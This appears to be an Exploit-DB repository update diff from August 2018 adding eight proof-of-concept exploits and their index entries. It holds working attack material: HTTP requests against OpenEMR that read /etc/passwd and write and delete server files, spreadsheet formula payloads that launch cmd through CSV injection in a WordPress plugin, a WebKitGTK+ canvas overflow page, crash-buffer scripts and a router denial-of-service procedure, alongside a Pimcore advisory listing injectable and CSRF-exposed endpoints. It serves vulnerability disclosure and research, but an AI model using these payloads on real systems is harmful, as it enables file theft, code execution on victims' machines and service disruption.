DB: 2018-08-17

8 changes to exploits/shellcodes

TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)
Central Management Software 1.4.13 - Denial of Service (PoC)

WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)

OpenEMR 5.0.1.3 - Arbitrary File Actions
Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery

exploits/hardware/dos/45203.txt

@@ -0,0 +1,20 @@
+# Exploit Title: TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
+# Exploit Author:  Aniket Dinda
+# Date: 2018-08-05
+# Vendor Homepage: https://www.tp-link.com/
+# Hardware Link:  https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q
+# Version: TP-Link Wireless N Router WR840N
+# Firmware version :  0.9.1 3.16 v0001.0 Build 170608 Rel.58696n
+# Category: Hardware
+# Tested on: Windows 10
+# CVE: CVE-2018-15172
+
+# Proof Of Concept:
+
+1- First connect to this network
+2- Open BurpSuite and then start the intercept, making the necessary proxy changes to the internet browser.
+3- Goto Quick setup > 
+4- Now as the Burp is intercept is on, you will find an Authorization: Basic followed by a string. 
+5- Now we paste a string consisting of 2000 zeros.
+6- Then forward the connection
+7- Then your router automatically logout and net connection will be gone.

exploits/linux/local/45205.txt

@@ -0,0 +1,58 @@
+# Exploit Title: WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)
+# Date: 2018-08-15
+# Exploit Author: PeregrineX
+# Vendor Homepage: https://webkitgtk.org/ & https://webkit.org/wpe/
+# Software Link: https://webkitgtk.org/releases/ & https://wpewebkit.org/releases/
+# Version: <2.20.3 (GTK+) <2.20.1 (WPE)
+# Tested on: WebKitGTK+ 2.20.2
+# CVE : CVE-2018-12293
+
+# SUMMARY:
+# getImageData() in ImageBufferCairo.cpp multiplies rect.width() * rect.height() * 4 
+# without any overflow checks. If result is larger than UINT_MAX, 
+# heap-based buffer overflow via integer overflow will occur, 
+# which could be exploited further.
+
+# Works on WebKitGTK+ <2.20.3 and WPE WebKit <2.20.1
+# Credit to ADlab of Venustech for originally finding this vulnerability.
+
+Vulnerable Code (Source/WebCore/platform/graphics/cairo/ImageBufferCairo.cpp):
+
+template <AlphaPremultiplication premultiplied>
+RefPtr<Uint8ClampedArray> getImageData(const IntRect& rect, const IntRect& logicalRect, const ImageBufferData& data, const IntSize& size, const IntSize& logicalSize, float resolutionScale)
+{
+    auto result = Uint8ClampedArray::createUninitialized(rect.width() * rect.height() * 4);
+    if (!result)
+        return nullptr;
+//...
+
+# Proof of Concept:
+<html>
+  <head>
+    <script>
+        funciton poc() {
+            var c = document.getElementById("myCanvas");
+            var ctx = c.getContext("2d");
+            var imgData = ctx.getImageData(0, 0, 32768, 32768);
+        }
+    </script>
+  </head>
+  <body onload="poc()">
+    <canvas id="myCanvas" width="32768" height="32768">No HTML5 canvas tag.</canvas>
+  </body>
+</html>
+
+# Output snippet
+UBSAN output:
+../Source/JavaScriptCore/runtime/JSGlobalObject.cpp:1608:22: runtime error: 
+call to function (unknown) through pointer to incorrect function type 
+'JSC::RuntimeFlags (*)(const JSC::JSGlobalObject *)'
+(/usr/local/lib/libwebkit2gtk-4.0.so.37+0x11116c70): note: (unknown) defined here
+SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior 
+../Source/JavaScriptCore/runtime/JSObject.h:695:17 in 
+DerivedSources/JavaScriptCore/KeywordLookup.h:469:13: runtime error: 
+load of misaligned address 0x7fd8a1d95062 for type 'const uint32_t' 
+(aka 'const unsigned int'), which requires 4 byte alignment
+0x7fd8a1d95062: note: pointer points here
+ 00 00  28 66 75 6e 63 74 69 6f  6e 20 28 74 68 69 73 56  61 6c 75 65 2c 20 61 72  67 75 6d 65 6e 74
+              ^

exploits/linux/webapps/45167.txt

@@ -2,7 +2,7 @@
 # Shodon Dork: iPECS CM
 # Exploit Author: Safak Aslan
 # Software Link: www.ipecs.com
-# Version: 30M (System)
+# Version: 30M-B.2Ia and 30M-2.3Gn
 # Authentication Required: No
 # Tested on: Linux
 # CVE: N/A

exploits/linux/webapps/45202.txt

@@ -0,0 +1,88 @@
+# Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions  
+# Date: 2018-08-14
+# Exploit Author: Joshua Fam
+# Twitter : @Insecurity
+# Vendor Homepage: https://www.open-emr.org/
+# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
+# Version: < 5.0.1.3 
+# Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
+# CVE : CVE-2018-15142,CVE-2018-15141,CVE-2018-15140
+
+# 1.Arbitrary File Read:
+# In OpenEmr a user that has access to the portal can send a malcious 
+# POST request to read arbitrary files.
+
+# i.Vulnerable Code:     
+#  if ($_POST['mode'] == 'get') {
+#    echo file_get_contents($_POST['docid']);
+#    exit;
+#  }
+
+# ii. Proof of Concept:
+POST /openemr/portal/import_template.php HTTP/1.1
+Host: hostname
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101        Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 26
+
+mode=get&docid=/etc/passwd
+
+# 2.Arbitrary File Write:
+# In OpenEmr a user that has access to the portal can send a malcious 
+# POST request to write arbitrary files.
+ 
+#  i. Vulnerable Code:     
+#    } else if ($_POST['mode'] == 'save') {
+#        file_put_contents($_POST['docid'], $_POST['content']);
+#        exit(true);
+#    }
+  
+#  ii. Proof of Concept:
+POST /openemr/portal/import_template.php HTTP/1.1
+Host: hostname
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 54
+
+mode=save&docid=payload.php&content=<?php phpinfo();?>
+
+# After sending this navigate to payload.php at http://hostname/openemr/portal
+
+# 3. Arbitrary File Delete:
+# In OpenEmr a user that has access to the portal can send a malcious 
+# POST request to delete a arbitrary file.
+  
+#  i. Vulnerable Code:      
+#     } else if ($_POST['mode'] == 'delete') {
+#       unlink($_POST['docid']);
+#       exit(true);
+#     }
+  
+#  ii. Proof of Concept:     
+POST /openemr/portal/import_template.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: OpenEMR=k3m0vq90hhb5et06rib5l7l8fq; PHPSESSID=1dbh9mom6ib07jqovfusgjc3vs
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 29
+
+mode=delete&docid=payload.php
+       
+# After completing this request, when you navigate to payload.php, you should be greeted by a 404 page.

exploits/php/webapps/45206.txt

@@ -0,0 +1,34 @@
+# Exploit Title: Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
+# Exploit Author: Javier Olmedo
+# Website: https://hackpuntes.com
+# Date: 2018-08-14
+# Google Dork: N/A
+# Vendor: Matt Cromwell
+# Software Link: https://wordpress.org/plugins/export-users-to-csv/
+# Affected Version: 1.1.1 and before
+# Active installations: +20,000
+# Patched Version: unpatched
+# Category: Web Application
+# Platform: PHP
+# Tested on: Win10x64
+
+# 1. Plugin Description:
+# WordPress Export Users to CSV plugin exports user data and meta data. 
+# You can even export the users by role and registration date range.
+ 
+# 2. Technical Description:
+# WordPress Export users to CSV plugin version 1.1.1. and before are affected by Remote Code Execution 
+# through the CSV injection vulnerability. This allows an application user to inject commands as part 
+# of the fields of his profile and these commands are executed when a user with greater privilege 
+# exports the data in CSV and opens that file on his machine.
+ 
+# 3. Proof Of Concept (PoC):
+# Enter the payload =SUM(1+1)*cmd|' /C calc'!A0 in any field of the profile, for example, in biography.
+# When the user with high privileges logs in to the application, export data in CSV and opens the 
+# generated file, the command is executed and the calculator will run open on the machine.
+
+# 4. Payloads:
+=SUM(1+1)*cmd|' /C calc'!A0
++SUM(1+1)*cmd|' /C calc'!A0
+-SUM(1+1)*cmd|' /C calc'!A0
+@SUM(1+1)*cmd|' /C calc'!A0

exploits/php/webapps/45208.txt

@@ -0,0 +1,215 @@
+SEC Consult Vulnerability Lab Security Advisory < 20180813-0 >
+=======================================================================
+              title: SQL Injection, XSS & CSRF vulnerabilities
+            product: Pimcore
+ vulnerable version: 5.2.3 and below
+      fixed version: 5.3.0
+         CVE number: CVE-2018-14057, CVE-2018-14058, CVE-2018-14059
+             impact: High
+           homepage: https://pimcore.com/en
+              found: 2018-06-11
+                 by: T. Silpavarangkura (Office Bangkok)
+                     N. Rai-Ngoen (Office Bangkok)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Europe | Asia | North America
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"Pimcore is an award-winning consolidated open source enterprise platform for
+master data management (PIM/MDM), user experience management (CMS/UX), digital
+asset management (DAM) and eCommerce."
+
+Source: https://pimcore.com/en
+
+
+Business recommendation:
+------------------------
+The vendor provides a patch for most identified issues, but XSS will not be fixed
+according to the vendor.
+
+An in-depth security analysis performed by security professionals is highly
+advised, as the software may be affected from further security issues.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1. SQL Injection (CVE-2018-14058)
+Multiple SQL injection vulnerabilities have been identified in the REST web
+service API. An attacker who obtains a valid API key that is granted a
+necessary permission could successfully perform an attack to extract
+information from the database.
+
+2. Stored Cross-site Scripting (CVE-2018-14059)
+Multiple stored cross-site scripting vulnerabilities have been identified
+across multiple functions in the application, which allows an authenticated
+attacker to insert arbitrary JavaScript code in virtually all text fields and
+data entries in the application.
+
+3. Cross-site Request Forgery (CVE-2018-14057)
+Multiple functions in the application are not protected by the existing
+anti-CSRF token, which allows an attacker to perform a cross-site request
+forgery attack to at least add, update or delete entries, among other actions.
+
+
+Proof of concept:
+-----------------
+1. SQL Injection (CVE-2018-14058)
+The following URLs demonstrate the issue:
+http://<host>/webservice/rest/asset-count?apikey=[...]&condition=<SQL Injection>
+http://<host>/webservice/rest/asset-inquire?apikey=[...]&id=<SQL Injection>
+http://<host>/webservice/rest/asset-list?apikey=[...]&condition=<SQL Injection>
+http://<host>/webservice/rest/document-count?apikey=[...]&condition=<SQL Injection>
+http://<host>/webservice/rest/document-inquire?apikey=[...]&id=<SQL Injection>
+http://<host>/webservice/rest/document-list?apikey=[...]&condition=<SQL Injection>
+http://<host>/webservice/rest/object-count?apikey=[...]&condition=<SQL Injection>
+http://<host>/webservice/rest/object-inquire?apikey=[...]&id=<SQL Injection>
+http://<host>/webservice/rest/object-list?apikey=[...]&condition=<SQL Injection>
+
+Note that a valid API key that is granted at least either "Assets", "Documents"
+or "Objects" permission is required to perform an SQL injection attack against
+associated API endpoints successfully.
+
+
+2. Stored Cross-site Scripting (CVE-2018-14059)
+Most of the text fields in pop-up dialogs and data entries in the application
+are vulnerable to the cross-site scripting vulnerability, which can be
+exploited by an authenticated attacker. For example, the attacker could insert
+an attack payload while performing at least the following actions:
+
+1) Edit a user account's first name/last name/e-mail address.
+2) Edit a Document Types/Predefined Properties/Predefined Asset Metadata/
+Quantity Value/Static Routes entry value in the table.
+3) Rename an Assets/Data Objects/Video Thumbnails/Image Thumbnails/
+Field-Collections/Objectbrick/Classification Store item.
+
+
+The vendor stated that many identified XSS issues only affect administrative
+functions and hence the issues will not be fixed:
+"They are only affecting administrative functionalities (higher privileges
+required) - so this isn't used by non-trusted users - a check just adds
+additional overhead without any benefits for security."
+
+SEC Consult argued multiple times that XSS can still be exploited e.g. when a
+higher privileged user gets attacked and the issues should be fixed nevertheless.
+
+
+3. Cross-site Request Forgery (CVE-2018-14057)
+The existing anti-CSRF token in the HTTP request header named
+"X-pimcore-csrf-token" was found to be validated only in the "Settings >
+Users / Roles" function. Therefore, an attacker could perform a cross-site
+request forgery attack against virtually all other functions in order to
+at least add, update and delete data without having to submit the anti-CSRF
+token.
+
+The non-exhaustive list of affected requests are listed below:
+POST /admin/asset/add-asset
+POST /admin/asset/add-asset-compatibility
+GET /admin/asset/delete
+GET /admin/asset/import-server
+GET /admin/asset/import-server-files
+GET /admin/asset/import-url
+POST /admin/asset/import-zip
+POST /admin/asset/update
+GET /admin/document/add
+GET /admin/document/delete
+POST /admin/document/doc-types
+POST /admin/email/blacklist
+POST /admin/email/email-logs
+POST /admin/email/save
+POST /admin/hardlink/save
+POST /admin/link/save
+POST /admin/newsletter/save
+GET /admin/object/add
+POST /admin/object/save
+GET /admin/object/delete
+POST /admin/page/save
+POST /admin/settings/metadata
+POST /admin/settings/properties
+POST /admin/settings/set-system
+POST /admin/settings/website-settings
+POST /admin/snippet/save
+
+
+Vulnerable / tested versions:
+-----------------------------
+The vulnerabilities have been identified in Pimcore version 5.2.3 which was the
+most current version at the time of discovery.
+
+
+Vendor contact timeline:
+------------------------
+2018-06-15: Contacting vendor through
+https://pimcorehq.wufoo.com/forms/pimcore-security-report
+2018-06-18: Vendor provides the fixes of SQL injection and CSRF in the nightly
+            build, but has a problem of reproducing the XSS.
+2018-06-18: Contacting vendor to request for a secure channel to provide
+            further details of the XSS.
+2018-06-18: Sending the details of the XSS.
+2018-06-19: Vendor fixes the SQL injection and only fixes the XSS partially.
+2018-06-20: Notifying vendor, that SQL injection and XSS are not properly fixed
+2018-06-20: Vendor inquires more details about the XSS.
+2018-06-21: Explaining vendor the XSS issues and notifying vendor that the CSRF
+            has been fixed.
+2018-06-21: Vendor will discuss the open issues internally.
+2018-07-11: Following up vendor regarding the fixes of the open issues.
+2018-07-11: Vendor completely fixes the SQL injection, but decides not to fix
+            the XSS in the administrative functions, patch release is planned
+            within the next two weeks
+2018-07-20: Vendor provides a patched version
+2018-08-13: Public release of security advisory
+
+
+Solution:
+---------
+The vendor has published a new release (version 5.3.0) which fixes most of the
+identified issues, but not the XSS issues that affect administrative functions:
+
+https://pimcore.com/en/download
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Europe | Asia | North America
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Thongchai Silpavarangkura / @2018

exploits/windows_x86-64/dos/45204.py

@@ -0,0 +1,26 @@
+# Exploit Title: ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)  
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-16
+# Homepage: https://www.ambientweather.com
+# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe
+# Tested Version: 1.4.0.1
+# Tested on OS: Windows 10
+
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the program. Now click "Okay" and in the new window paste the content of 
+# "exploit.txt" into the following fields:"IP". Click "Search" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 2000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86-64/dos/45207.py

@@ -0,0 +1,25 @@
+# Exploit Title: Central Management Software v1.4.13 - Denial of Service (PoC)  
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-08-16
+# Homepage: https://www.ambientweather.com
+# Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/Manuals/ambientcam/04_central_management_software.zip
+# Tested Version: 1.4.13
+# Tested on OS: Windows 10
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt" just copy the text inside "exploit.txt"
+# and start the CMS client program. In the new window paste the content of 
+# "exploit.txt" into the following fields:"Password". Click "Login" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 2000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -6046,6 +6046,9 @@ id,file,description,date,author,type,platform,port
 45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
 45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
 45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
+45203,exploits/hardware/dos/45203.txt,"TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)",2018-08-16,"Aniket Dinda",dos,hardware,
+45204,exploits/windows_x86-64/dos/45204.py,"ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
+45207,exploits/windows_x86-64/dos/45207.py,"Central Management Software 1.4.13 - Denial of Service (PoC)",2018-08-16,"Gionathan Reale",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9873,6 +9876,7 @@ id,file,description,date,author,type,platform,port
 45184,exploits/linux/local/45184.sh,"PostgreSQL 9.4-0.5.3 - Privilege Escalation",2018-08-13,"Johannes Segitz",local,linux,
 45192,exploits/android/local/45192.txt,"Android - Directory Traversal over USB via Injection in blkid Output",2018-08-13,"Google Security Research",local,android,
 45194,exploits/windows_x86-64/local/45194.py,"Wansview 1.0.2 - Denial of Service (PoC)",2018-08-14,"Gionathan Reale",local,windows_x86-64,
+45205,exploits/linux/local/45205.txt,"WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)",2018-08-16,PeregrineX,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39799,4 +39803,7 @@ id,file,description,date,author,type,platform,port
 45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
 45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
+45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
 45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
+45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
+45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80